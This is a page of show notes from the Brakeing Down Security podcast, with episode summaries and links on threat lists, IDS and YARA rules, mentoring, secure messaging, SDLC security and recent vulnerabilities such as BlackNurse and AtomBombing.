#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
----------
Published on: January 29, 20172017-002: Threat Lists, IDS/IPS rules, and mentoring
In your environment, you deal with threats from all over the world. Many groups out there pool resources to help everyone deal with those #threats. Some come in the form of threat #intelligence from various intelligence companies, like #Carbon #Black, #FireEye, and #Crowdstrike.
But what if your company cannot afford such products, or are not ready to engage those types of companies, and still need need protections? Never fear, there are open source options available (see show notes below). These products aren't perfect, but they will provide a modicum of protection from 'known' bad actors, SSH trolls, etc.
We discuss some of the issues using them, discuss how to use them in your #environment.
Lastly, we discuss #mentorship. Having a good mentor/mentee relationship can be mutally beneficial to both parties. We discuss what it takes to be a good mentee, as well as a good mentor...
RSS: www.brakeingsecurity.com/rss
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2017-002-mentoring_threat_lists.mp3
iTunes: https://itunes.apple.com/us/podcast/2017-002-threat-lists-ids/id799131292?i=1000380246554&mt=2
YouTube: https://www.youtube.com/watch?v=oHNrINl1oZE
----------
HITB announcement:
“Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback, or Suggestions? Contact us via Email: [email protected]
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
----------
Show Notes:
HANGOUTS: https://hangouts.google.com/call/w7rkkde5yrew5nm4n7bfw4wfjme
2017-002-Threat Lists, IDS/IPS rulesets, and infosec mentoring
- Threat Lists (didn’t have much time to research :/)
-
- THIS EXACTLY - http://blogs.gartner.com/anton-chuvakin/2014/01/28/threat-intelligence-is-not-signatures/
-
- Don’t use threat list feeds (by IP/domain) as threat intelligence
- Can use them for aggressively blocking, don’t use for alerting
- https://isc.sans.edu/suspicious_domains.html
- https://rules.emergingthreats.net/fwrules/emerging-Block-IPs.txt
- http://iplists.firehol.org/
- https://zeltser.com/malicious-ip-blocklists/
- https://medium.com/@markarenaau/actionable-intelligence-is-it-a-capability-problem-or-does-your-intelligence-provider-suck-d8d38b1cbd25#.ncpmqp9cx
- Spamhaus: https://www.spamhaus.org/
- leachers
- Open rulesets - You can always depend on the kindness of strangers
- Advantage is that these are created by companies that have worldwide reach
- Updated daily
- Good accompanying documentation
- You can buy large rulesets to use in your own IDS implementation
- Depends on your situation if you want to go managed or do yourself
- Regardless you need to test them
- Managed security services will do this for you
- I don’t recommend unless you have a team of dedicated people or you don’t care about getting hacked- signatures are way too dynamic, like trying to do AV sigs all by yourself
- Only a good idea for one-off, targeted attacks
- DIY
- IDS/IPS rulesets
- https://securityintelligence.com/signature-based-detection-with-yara/
- http://yararules.com/
- http://resources.infosecinstitute.com/yara-simple-effective-way-dissecting-malware/
- Yara rules
- For Mentors
-
- Set expectations & boundaries
- Find a good fit
- Be an active listener
- Keep open communication
- Schedule time
- Create homework
- Don’t assume technical level
- Ask questions
- Do your own research
- Find a good fit
- Put forth effort
- It’s not the Mentor’s job to handhold, take responsibility for own learning
- Value their time
- Come to each meeting with an agenda
- For Mentees
- Mentoring frameworks?
- InfoSec Mentoring
- Podcasts (Courtesy of Ms. Hannelore)
- https://t.co/mLXjfF1HEr
- https://gist.github.com/AFineDayFor/5cdd0341a2b384c20e615dcedeef074
2017-001: A New Year, malware legislation, and a new cast member!
We start Brakeing Down Security with a huge surprise! A 3rd member of the podcast! Amanda #Berlin (@infosystir) joins us this year to help us educate people on #security topics. During the year, she'll be getting us some audio from various conventions and giving us her perspective working as an #MSSP, as well as a blue team (defender).
We start out talking about new #California #legislation about making #malware illegal. What are politicians in California thinking? We work through that and try to find some understanding.
With all the various secure messaging systems out there, we discuss how why secure messaging systems fail so poorly with regards to #interoperability and the difficulties in getting average non-infosec people to adopt one. We also discuss #Perfect #Foward #Security and how it prevents people from decrypting old messages, even if the key is compromised.
----------
HITB announcement:
“Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback, or Suggestions? Contact us via Email: [email protected]
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
---Show Notes---
News story:
http://www.latimes.com/politics/la-pol-sac-crime-ransomware-bill-20160712-snap-story.html
“If this legislation gives prosecutors the tools that they didn’t have before, where are the cases that they have lost because they didn’t have these tools?” said Brandon Perry, a senior consultant for NTT Com Security. “Authorities are focused on prosecuting criminals that they can’t even find, as opposed to educating the victims to prevent this from happening again and again.”
Ransomware won’t infect you if you watch training videos:
http://thehackernews.com/2017/01/decrypt-ransomware-files.html
Secure messaging - stuck in an Apple ecosystem
Too many, no interoperability
Signal, Whisper, Wickr, Wire, WhatsApp, FB messenger
I uninstalled Signal… can’t convince people to adopt something if everyone cannot message one another --BrBr
OpenPGP is ‘dangerous’
http://arstechnica.com/information-technology/2016/12/signal-does-not-replace-pgp/
Forward Secrecy - https://en.wikipedia.org/wiki/Forward_secrecy
“A public-key system has the property of forward secrecy if it generates one random secret key per session to complete a key agreement, without using a deterministic algorithm.” (input given gives the same output every time)
Perfect Forward Secrecy - “In cryptography, forward secrecy (FS; also known as perfect forward secrecy[1]) is a property of secure communication protocols in which compromise of long-term keys does not compromise past session keys.
Ms. Amanda’s pentest homework:
“https://docs.google.com/document/d/17NJPXpqB5Upma2-6Hu5svBxd8PH0Ex7VgCvRUhiUNk8/edit”
Published on: January 12, 20172016-051: Steps to fixing risks you found, and the State of the Podcast
It's the final episode of the the year, and we didn't slouch on the #infosec. Mr. Boettcher discussed what should happen when we find risk and how we handle it in a responsible manner.
I also issue an 'open-letter' to C-Level. We need C-Levels to listen and accept the knowledge and experience of your people. Infosec people are often the only thing keeping a company from making the front page, and yet are still seen as speed bumps.
We also discuss some the previous episodes of the year, some recent developments to build our #community, like our book club and upcoming #CTF club.
Plus, there is one other surprise, but you'll have to wait until our next episode to find out!
Enjoy our final episode of 2016. Our regular show will return the week of 9 January 2017!
https://en.wikipedia.org/wiki/Yahoo!_data_breaches#Legal_and_commercial_responses
iTunes:
YouTube: https://www.youtube.com/watch?v=w56W5gMMg0E
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-051-State_of_the_podcast_Finding_and_managing_risk.mp3
Special deal for our #BrakeSec Listeners:
"If you have an interesting security talk and fancy visiting #Amsterdam in the spring, then submit your talk to the Hack In The Box (#HITB) Amsterdam conference, which will take place between 10 to 14 April 2017. The Call For Papers (#CFP) is open until the end of December, submission details can be found at https://cfp.hackinthebox.org/.
Tickets are already on sale, with early bird prices until 31 December 2016. And the 'brakeingsecurity' discount code gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity!
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback, or Suggestions? Contact us via Email: [email protected]
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Google Play Store https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Published on: December 25, 20162016-050: Holiday Spectacular with a little help from our friends!
Brakesec Podcast joined:
Edgar #Rojas (@silverFox) and Tracy #Maleef (@infosecSherpa) from the #PVC #Security #podcast (@pvcsec)
Joe Gray (@C_3PJoe) from the Advanced Persistent Security Podcast
Jerry #Bell (@maliciousLink) and Andrew #Kalat (@lerg) from the #Defensive Security podcast (@defensiveSec)
And Amanda #Berlin (@infosystir) for a light-hearted holiday party. We discuss things we learned this year, and most of us refrained from making the famous "#prediction" lists. You also get to hear my lovely wife come in and bring me #holiday #sweeties and even dinner, as she had no idea we were recording at the time (she later told me "You sounded like you were having too much fun, so I assumed you weren't recording")
**there might be some explicit language**
Join us won't you, and listen to 3 fantastic podcasts mix it up for the holidays.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-050-holiday_spectacular-defsec-advpersistsec-brakesec-infosystir.mp3
#YouTube: https://www.youtube.com/watch?v=sJaAG0KRpDY
#iTunes: https://itunes.apple.com/us/podcast/2016-050-holiday-spectacular/id799131292?i=1000379206297&mt=2
Special deal for our #BrakeSec Listeners:
"If you have an interesting security talk and fancy visiting #Amsterdam in the spring, then submit your talk to the Hack In The Box (#HITB) Amsterdam conference, which will take place between 10 to 14 April 2017. The Call For Papers (#CFP) is open until the end of December, submission details can be found at https://cfp.hackinthebox.org/.
Tickets are already on sale, with early bird prices until December 31st. And the 'brakeingsecurity' discount code gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity!
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback, or Suggestions? Contact us via Email: [email protected]
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: December 21, 2016
2016-049-Amanda Berlin, the art of the sale, and Decision making trees
"Always Be Closing" is the mantra that Alec Baldwin's character "Blake" intones in the movie "#GlenGarry #Glen #Ross". Ironically, the film about 4 men selling was a failure in the theaters.
A lot of times as #blue #teamers, we find ourselves in the sights of a #sales person, or often enough, we are inviting them into our conference rooms to find out how their widget will help save the day. There's an art to the concept of selling, honed over the past 500,000 years, since Ugg tried to convince Oog that his wheel would revolutionize work...
We asked Ms. Amanda Berlin (@infosystir) to join us this week, for her expertise at working at an security company, as well as someone who sells products, to discuss how and why sales and sales engineers do what they do. I posit that there must be 'decision tree' or script that most follow in an effort to make a sale, and how to confront the pushy sales pitch head on, or in Amanda's way, to avoid it altogether.
We discuss Amanda's book she co-wrote with Lee Brotherston, whom we've had on our show before. Their #O'Reilly #book is on pre-sale right now, so you can order "The #Defensive #Security #Handbook" here: http://shop.oreilly.com/product/0636920051671.do
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-049-amanda_berlin_the_art_of_the_sale_decision_making_trees.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-049-amanda-berlin-art/id799131292?i=1000378988303&mt=2
Youtube: https://www.youtube.com/watch?v=v0llOSXfzBg
Special deal for our #BrakeSec Listeners:
"If you have an interesting security talk and fancy visiting Amsterdam in the spring, then submit your talk to the Hack In The Box (#HITB) Amsterdam conference, which will take place between 10 to 14 April 2017. The Call For Papers (#CFP) is open until the end of December, submission details can be found at https://cfp.hackinthebox.org/.
Tickets are already on sale, with early bird prices until December 31st. And the 'brakeingsecurity' discount code gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity!
Join our Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback, or Suggestions? Contact us via Email: [email protected]
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
2016-048: Dr. Gary McGraw, Building Security into your SDLC, w/ Special guest host Joe Gray!
As part of our ongoing discussion about the #SDLC and getting security baked in as far left as possible, Joe Gray, host of the Advanced Persistant Security #Podcast (find it at https://advancedpersistentsecurity.net/), Mr. Boettcher, and I sat down with Dr. Gary McGraw, author of "Software Security: Building Security In" to discuss his book. We are also doing this book as part of the Brakeing Security Book Club (check out our #Slack channel for more information).
Gary walks us through the 7 Kingdoms of getting more security in, including doing automated and manual code audits, proper penetration testing of the application at various stages (testing), documentation (if you don't know it works, how can you test it?), and your Security Operations people, monitoring for things once it goes into production. Also, find out what Chapter he thinks you should skip altogether... the answer may surprise you... :)
Join Mr. Gray, Mr. Boettcher, and I for a discussion with a true leader in the software and application security industry.
Buy the book on Amazon: https://www.amazon.com/Software-Security-Building-Gary-McGraw/dp/0321356705
Check out Gary's Website at https://www.garymcgraw.com/, and check out Gary's own podcast the Silver Bullet Security Podcast at https://www.garymcgraw.com/technology/silver-bullet-podcast/
Gary's twitter is @cigitalgem
Joe Gray's twitter is @C_3PJoe
Special deal for our #BrakeSec Listeners:
"If you have an interesting security talk and fancy visiting Amsterdam in the spring, then submit your talk to the Hack In The Box Amsterdam conference, which will take place between 10 to 14 April 2017. The Call For Papers (#CFP) is open until the end of December, submission details can be found at https://cfp.hackinthebox.org/.
Tickets are already on sale, with early bird prices until December 31st. And the 'brakeingsecurity' discount code gets you a 10% discount". Brakeing Down Security thanks Sebastian Paul Avarvarei and all the organizers of Hack In The Box (#HITB) for this opportunity!
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-048-Gary_McGraw_Securing_Your_SDLC_and_guest_host_Joe_Gray.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-048-dr.-gary-mcgraw-building/id799131292?i=1000378548363&mt=2
YouTube: https://www.youtube.com/watch?v=x65yL5_Hpi4
Join our Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback, or Suggestions? Contact us via Email: [email protected]
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
2016-047: Inserting Security into the SDLC, finding Privilege Escalation in poorly configured Linux systems
Just a quick episode this week...
As part of the Brakesec Book Club (join us on our #Slack Channel for more information!) we are discussing Dr. Gary McGraw's book "Software Security: Building Security In" (Amazon Link: https://is.gd/QtHQcM)
We talk about the need to inserting security into your company's #SDLC... but what exactly can be done to enable that? I talk about abuse cases, #risk #analysis, creating test cases, pentesting, and #security #operations are all methods to do so.
Finally, I discovered a blog talking about ways to discover configuration errors on Linux systems that might allow #privilege #escalation to occur. Using these tools as part of your hardening processes could lower the risk of a bad actor gaining elevated privileges on your *unix hosts
http://rajhackingarticles.blogspot.com/2016/11/4-ways-to-get-linux-privilege-escalation.html
You can find the github of this script and the audit software that I mentioned below:
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: November 28, 2016
2016-046: BlackNurse, Buenoware, ICMP, Atombombing, and PDF converter fails
This week, Mr. Boettcher found himself with an interesting conundrum concerning what happened when he converted a Windows DOCX file to a PDF using a popular #PDF converter software. We discuss what happened, how Software Restriction Policy in Windows kept him safe from a potential malware infection, and about the logging that occurred.
After that, we discuss some recent vulnerabilities, like the BlackNurse Resource Exhaustion vulnerability and how you can protect your infrastructure from a DDoS that can occur from someone sending your firewall 300 packets a second... which anyone can do.
We discuss Robert Graham's recent run-in with a new surveillance camera and how it was pwned in less time than you think. And learn about the 'buenoware' that has been released that 'patches' IoT and embedded devices... But does it do more harm than good, and is it legal?
All that and more this week on Brakeing Down Security Podcast!
Check out our official #Slack Channel! Sign up at https://brakesec.signup.team
Next Book Club session is 29 November 2016. Our current book for study is 'Software Security: Building Security In' by Dr. Gary McGraw https://www.amazon.com/Software-Security-Building-Gary-McGraw/dp/0321356705 (ebook is available of Safari books online)
BlackNurse
https://nakedsecurity.sophos.com/2016/11/17/blacknurse-revisited-what-you-need-to-know/
http://researchcenter.paloaltonetworks.com/2016/11/note-customers-regarding-blacknurse-report/
http://www.netresec.com/?page=Blog&month=2016-11&post=BlackNurse-Denial-of-Service-Attack
Recent tweet from @boettcherpwned about infected docx with macros and we discuss why Foxit PDF runs the macros and open_document:
https://twitter.com/boettcherpwned/status/799726266693713920
Rob Graham @errataBob: new camera pwned by #Mirai botnet and others within 5 minutes:
https://twitter.com/newsyc200/status/799761390915424261
#BlackNurse
https://nakedsecurity.sophos.com/2016/11/17/blacknurse-revisited-what-you-need-to-know/
http://researchcenter.paloaltonetworks.com/2016/11/note-customers-regarding-blacknurse-report/
http://www.netresec.com/?page=Blog&month=2016-11&post=BlackNurse-Denial-of-Service-Attack
ICMP
Type 3, Code 3 (Destination Port unreachable) http://www.faqs.org/rfcs/rfc792.html
#SHA1 deprecated on website certs by Chrome on 1 January 2017
#Benevolent #malware (buenoware)
https://isc.sans.edu/diary/Benevolent+malware%3F+reincarnaLinux.Wifatch/21703
#Atombombing
http://blog.ensilo.com/atombombing-a-code-injection-that-bypasses-current-security-solutions
https://breakingmalware.com/injection-techniques/atombombing-cfg-protected-processes/
http://www.pandasecurity.com/mediacenter/malware/atombombing-windows-cybersecurity/
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-046-Black_Nurse_buenoware_IoT_pwnage.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-046-blacknurse-buenoware/id799131292?i=1000378076060&mt=2
Youtube: https://www.youtube.com/watch?v=w-FEJuWGXaQ
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
2016-044: Chain of Custody, data and evidence integrity
During a Security Incident, or in the course of an investigation, it may become necessary to gather evidence for further use in a possible court case in the future. But if you don't have 4-10,000 dollars USD for fancy forensic software, you'll need to find methods to preserve data, create proper integrity, and have a proper custody list to show who handled the data, how it was collected, etc.
This podcast was not meant to turn you into an expert, but instead to go over the finer points of the process, and even where you should turn to if you need help.
Certified Ethical Hacker book I was referencing in the show: http://www.wiley.com/WileyCDA/WileyTitle/productCd-1119252245,miniSiteCd-SYBEX.html
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-044-Evidence_chain_of_custody_data_integrity.mp3
#YouTube: https://www.youtube.com/watch?v=aJA2ry6npKI
#iTunes: https://itunes.apple.com/us/podcast/2016-044-chain-custody-data/id799131292?i=1000377566298&mt=2
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: November 7, 20162016-043: BSIMMv7, a teachable moment, and our new Slack Channel!
**Brakeing Down Security has a Slack channel now... just go to https://brakesec.signup.team and follow the instructions to have the bot add you to our show's official channel.**
Every year, organizations come out with industry reports that show how well or, more often than not, how poorly we are doing.
We always even reviewing the BSIMM report, because it's an unvarnished, and a good measure of a good number of industry verticals, like finance, manufacturing, cloud, and even companies that make IoT devices.
Join Mr. Boettcher and I this week as we go over the findings of the report, discuss what got better, what still sucks, and what shouldn't we fault companies for not having.
We also have a teachable moment when I discuss a security paux fas that happened to me (Bryan) recently regarding an email account and my Skype. 2 factor authentication is your friend, and if it's available, use it.
Mr. Boettcher discusses some recent malware that has reared it's ugly head, and how to detect it.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-043-BSIMMv7.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-043-bsimmv7-teachable/id799131292?i=1000377394890&mt=2
YouTube: https://www.youtube.com/watch?v=I3FLSLSSb_Y
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: November 1, 2016
2016-042-Audio from Source Seattle 2016 Conference
Join us for a special episode this week! I (Bryan) was able to attend my first Source Seattle convention. Two days of talks, technical and non-technical, combining red/blue team concepts, as well as professional development, to help you navigate the corporate waters easier.
I was able to interview a number of people from the conference. You can see a partial list of them here:
http://www.sourceconference.com/single-post/2016/09/30/SOURCE-Seattle-Highlights
Interviewed
Chip McSweeney from OpenDNS (@chipmcmalware) and Rob Cheyne about the conference and got a bit of information about Chip's talk on "Domain Generating Algorithms" (DGA) that #malware use for domain C&C, and how to detect and reverse certain algos.
Rob Cheyne is the organizer of Source, so we talked a bit about the history and difficulties putting on 3 of these a year, and what makes the "Source" conference format so different.
Masha Sedova was one of the keynote speakersto discuss how she gamified her information security program and got everyone involved. Really excellent talk about changing organizational behavior.
Rob Fuller gave two days of Metasploit training, to show the versatility and to teach about the effectiveness of this tool. I also ask if Metasploit has reached it's end, since it's easily detected in many environments. Rob is a great interview and gives me his unvarnished opinion.
Mike Shema from https://cobalt.io/ discussed expanding and tailoring your bug bounty program to suit your organization and to ensure that your bug bounty program is mature. Using private bug bounties, and ensuring proper follow through in a timely manner can ensure maximum bang for the buck.
Last but not least, Deidre Diamond who did a keynote about 'Words to Stop Using now'. Deidre is the CEO of a national cyber security staffing company (Cyber Security Network) and Founder of a not-for-profit that empowers women in the infosec industry. Hear her thoughts on how leadership training is needed in the corporate environment, I ask her why we still need recruiters with hiring sites and why job descriptions are still a thorn in everyone's sides.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-042-Source_Seattle_2016_audio.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-042-audio-from-source/id799131292?i=1000377063127&mt=2
YouTube: https://www.youtube.com/watch?v=sj_SD2k7zXw
#RSS: http://www.brakeingsecurity.com/rss
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: October 24, 2016
2016-041- Ben Johnson, company culture shifts, job descriptions, cyber self-esteem
Ben Johnson has been around the industry for a good while, and has seen a lot of ugly things in our industry.
Ben had written a recent blog post (https://www.carbonblack.com/2016/08/12/benvlog-3-negative-forces-driving-security/) detailing the issues that seem to plague many companies and many people in the infosec community.
We talked about these issues in depth, and how companies and even the employees in a company can ease some of their burdens, and how they can make some changes to make your company culture better.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-041-Ben_johnson.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-041-ben-johnson-company/id799131292?i=1000376744922&mt=2
YouTube: https://www.youtube.com/watch?v=HrTPH97-YIY
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: October 17, 20162016-040: Gene_Kim, Josh_Corman, helping DevOps and Infosec to play nice
If you work in a #DevOps environment, you're on one side of the fence... you're either with the devs, you have freedom to make changes, and everything is great.
If you're on the Security and/or Compliance side, it's a desolate wasteland of watching people play fast and loose with policies, no one documenting anything, and you're seen as a 'barrier' to getting the new hotness out.
But does it have to be that way? This week, we sat down with DevOps veterans Gene Kim and Josh Corman to discuss how we can make security, compliance, and DevOps to play nice with one another.
Gene Kim's new book (excerpt): http://itrevolution.com/handbook-excerpt
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-040-Gene_Kim-Josh_Corman-Getting_Security-and_DevOps_playing_nice.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-040-gene-kim-josh-corman/id799131292?i=1000376417012&mt=2
YouTube: https://www.youtube.com/watch?v=fOuSRYJtiKo
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
Published on: October 10, 20162016-039-Robert Hurlbut, Threat Modeling and Helping Devs Understand Vulnerabilities
Join us this week as Robert Hurlbut (@roberthurlbut on Twitter), is an independent consultant with over 25 years of application experience, helps us understand best methods to getting developers on the same level as security professionals with application security flaws.
We also discuss some of the soft skills involved in bringing new concepts to organizations, like teaching proper coding conventions, changing up the development lifecycle, and helping to improve the skills of developers and managers.
Robert's Website is chock full of good information about threat modeling and secure coding practices at http://www.roberthurlbut.com
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-039-Robert_Hurlbut-threat_modeling_and_analysis.mp3
